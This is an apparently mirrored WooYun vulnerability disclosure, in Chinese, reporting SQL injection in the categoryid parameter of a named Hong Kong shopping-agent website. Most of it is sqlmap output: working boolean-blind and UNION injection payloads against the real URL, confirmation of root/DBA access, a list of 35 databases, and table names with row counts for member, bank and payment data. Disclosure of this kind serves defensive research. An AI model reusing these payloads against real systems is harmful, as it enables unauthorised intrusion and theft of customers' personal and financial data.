乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-09: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-08-23: 厂商已经主动忽略漏洞,细节向公众公开
请叫我安全小飞侠,谢谢!
香港VVCITY代购网主站SQL注入,涉及35个数据库,包括大量订单和用户信息(用户名,密码,手机,地址,银行卡号等等)。
http://www.vvcity.com/cn/item_info.php?source=yahooshopping&id=lifeessence_bathsalts-sample-1&categoryid=13538注入参数: categoryidsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: http://www.vvcity.com:80/cn/item_info.php?source=yahooshopping&id=lifeessence_bathsalts-sample-1&categoryid=(SELECT (CASE WHEN (4464=4464) THEN 4464 ELSE 4464*(SELECT 4464 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: http://www.vvcity.com:80/cn/item_info.php?source=yahooshopping&id=lifeessence_bathsalts-sample-1&categoryid=-4017 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71786b7171,0x79676d576e7354506878,0x7171787171),NULL,NULL,NULL,NULL-----[14:26:53] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.2.6, Apache 2.2.8back-end DBMS: MySQL 5.0[14:26:53] [INFO] fetching current user[14:26:55] [WARNING] reflective value(s) found and filtering outcurrent user: 'root@localhost'current database: 'probid'current user is DBA: True
available databases [35]:[*] balance[*] bitweaver[*] customer_service[*] datacenter[*] diamond[*] fresh[*] fresh2[*] girsty[*] glory[*] hoorayos[*] information_schema[*] insect[*] korea_shopping[*] mysql[*] mytest[*] ohmycome[*] paypal[*] phpmyadmin[*] probid[*] probid333[*] seo[*] shop[*] shop68[*] siu[*] sjc[*] sms[*] staff_time_slot[*] taobaoke[*] test[*] united[*] vv_api[*] welldone[*] winsix[*] winsix_site2[*] zozojpDatabase: probid[274 tables]+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| log | 4794997 || hk_whatsapp_phone | 4192002 || auction_log | 2887586 || search_keyword | 867548 || code_running_time | 703338 || `usage` | 613965 || auction_log_backup | 399434 || portage_log | 238293 || auction | 171733 || auction_conversation | 143934 || email_list | 124197 || deposit | 119608 || alipay_audit | 113914 || ipcountry | 111799 || service_charge_log | 108842 || yahoo_autopay | 100927 || deposit_automation | 91607 || taobao_deposit | 79807 || order_shopping | 75761 || deposit_log | 72374 || auction_option | 71418 || item_category_japan_jyahoobid | 69549 || portage_order | 63964 || deposit_automation_old | 56812 || auction_conversation_backup | 48660 || item_category_japan_jrakutenshopping | 47893 || watchlist | 44376 || email_log | 40844 || yahoo_auction_category | 38919 || auction_service | 31579 || rakuten_category | 29466 || member | 25662 || rakuten_bank | 24879 || bank_pretend | 22685 || auction_tax_cert | 21709 || timeattendence | 21579 || banip | 20942 || portage | 20458 || tbk_receipt2 | 20125 || auction_won_items | 19981 || hk_whatsapp_collect_range | 19966 || sms_record | 19242 || tbk_report3 | 16962 || lang | 14432 || auction_fail | 14295 || deposit_audit | 13672 || visit | 13551 || auction_drawback_item_new | 13377 || auction_sub | 13338 || japan_pickup | 13325 || taobao_deposit_history | 12220 || item_hot_japan | 11847 || bidders_category | 10464 || business_promotion | 10325 || item_category_japan_jyahooshopping | 9979 || coupon | 9719 || yahoo_shopping_category | 9472 || member_enquire | 9155 || rakuten_bank_bf | 8377 || bio_taobaocategory | 8362 || twyahoo_category | 7127 || item_declare | 6873 || promotion_sms | 6101 || hk_whatsapp_group_phone | 4609 || ipcountry_new | 4333 || jp_url | 4297 || taobao_cat | 4099 || auction_drawback_item_new_bf | 3852 || paypal | 3785 || balance | 3699 || deposit_auto_order | 3675 || deposit_auto_user | 3636 || entrylog | 3462 || taobao_alipay_acc | 3086 || user_auction | 2579 || member_crm | 2244 || hk_whatsapp_sender | 2152 || tbk_user2 | 2060 || mkcash | 1993 || gmail | 1761 || auction_cash_delivery | 1722 || taobao_tmall_cat | 1712 || rakuten_bank_backup | 1658 || cart | 1657 || entry_log | 1642 || forum_post | 1258 || taobao_cat_new | 1163 || auction_question | 1089 || auction_drawback_item_new_backup | 1025 || auction_reseller_charge | 996 || auction_drawback_item | 994 || drawback_item | 900 || question | 833 || withdraw_feedback | 830 || bank_record | 752 || rate_auto | 748 || auction_sellermsg_sentfail | 657 || auction_tb | 654 || quotation | 607 || promo_sms | 506 || tbk_cash2 | 480 || notice | 424 || member_identify | 403 || taobao_withdraw | 398 || fee | 385 || bank_import | 378 || tbk_receipt | 364 || procat_item | 330 || api_access_log | 320 || auction_paid_items | 311 || location_stock_time | 290 || taobao_deposit_duplicate | 271 || japan_accountant | 266 || `order` | 253 || country | 239 || `exception` | 226 || `api_mogujie_category_just-test` | 222 || jp_cat | 216 || auction_contact | 207 || hk_whatsapp_group | 191 || stock | 190 || banking_accountant | 174 || portage_category | 168 || auction_sell | 161 || customer_pending_event | 160 || location_cash | 159 || hk_whatsapp_group_send_log | 154 || api_mogujie_category | 152 || banktransfer | 148 || sp_attribute | 146 || like_record_detail | 122 || hk_stock | 121 || like_record | 117 || rate_log | 112 || expense | 104 || deposit_sub_user | 94 || customer_pending_log | 86 || member_forum | 86 || rate_intl | 84 || taobao_defined_cat | 81 || rate_cost | 74 || web_announcement | 67 || portage_courier | 64 || remittance_agent | 61 || japan_declare_enname | 58 || fanclub_order | 53 || fedex_waybill | 53 || holiday_item | 53 || item_find_log | 47 || tags | 47 || products | 46 || customer_feedback | 44 || yauction_subcategory | 37 || staff | 33 || staff_time_slot | 33 || deposit_temp | 32 || procat_category | 31 || item_category_japan_jyahoobid_test | 30 || item_find | 30 || event_cron | 29 || alipay_calc | 26 || hk_category | 25 || sp_detail | 25 || yauction_category | 25 || deposit_type | 24 || yahoo_account | 24 || sp_catsub | 23 || find_itemcat | 22 || tbk_user | 22 || api_usage | 21 || hotlist | 20 || stock_category | 20 || discount_list | 19 || discuz_mem | 19 || autosearch | 18 || tbk_cash | 18 || deposit_amendment | 17 || product_category | 17 || discuz_list | 16 || discuz | 15 || hk_whatsapp_reply | 15 || seo_proxy | 15 || find_product | 14 || hk_whatsapp_operator | 12 || item_status | 12 || mkcash_cat | 11 || auction_gmail_ext | 10 || email_content | 10 || japan_accountant_type | 10 || member_points | 10 || portage_charge | 10 || share_item_comment | 10 || stock_location | 10 || tbk_report2 | 10 || colleague | 9 || product_item | 9 || share_items | 9 || sp_category | 9 || barcode_label | 8 || deposit_status | 8 || fee_type | 8 || paypal_account | 8 || post_type | 8 || sp_product | 8 || keywords | 7 || member_type | 7 || portage_location | 7 || stock_keyword | 7 || alipay_type | 6 || app | 6 || ass_pattern | 6 || m_points | 6 || share_link | 6 || alimama_report | 5 || auction_schedule_items | 5 || deposit_method | 5 || fanclub_status | 5 || find_web_name | 5 || tsearch | 5 || agent_account | 4 || item_cat | 4 || item_type | 4 || log_type | 4 || sms_bid | 4 || account_balance | 3 || auction_received_jp | 3 || bank_account | 3 || crm_ratio | 3 || customer_contact_inquire | 3 || deposit_desc | 3 || portage_address | 3 || remittance_bank_fee | 3 || reseller_config | 3 || service_charge_type | 3 || share_item_like | 3 || tsearch_type | 3 || website_spread | 3 || website_spread_log | 3 || delivery | 2 || deposit_account | 2 || fb_company | 2 || fee_region | 2 || find_status | 2 || fram_site | 2 || promotion_website_member | 2 || question_type | 2 || rank_jp | 2 || share_album | 2 || user_session | 2 || commission | 1 || crm_config | 1 || lkr | 1 || m_coupon | 1 || oauth | 1 || promotion_website | 1 || rate | 1 || shopping_discount | 1 || taobao_rate | 1 || tbk_order | 1 || tbk_setting | 1 || website_spread_cash | 1 |+--------------------------------------+---------+Database: probid+--------+---------+| Table | Entries |+--------+---------+| member | 25662 |+--------+---------+
你懂的,好好修复!
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
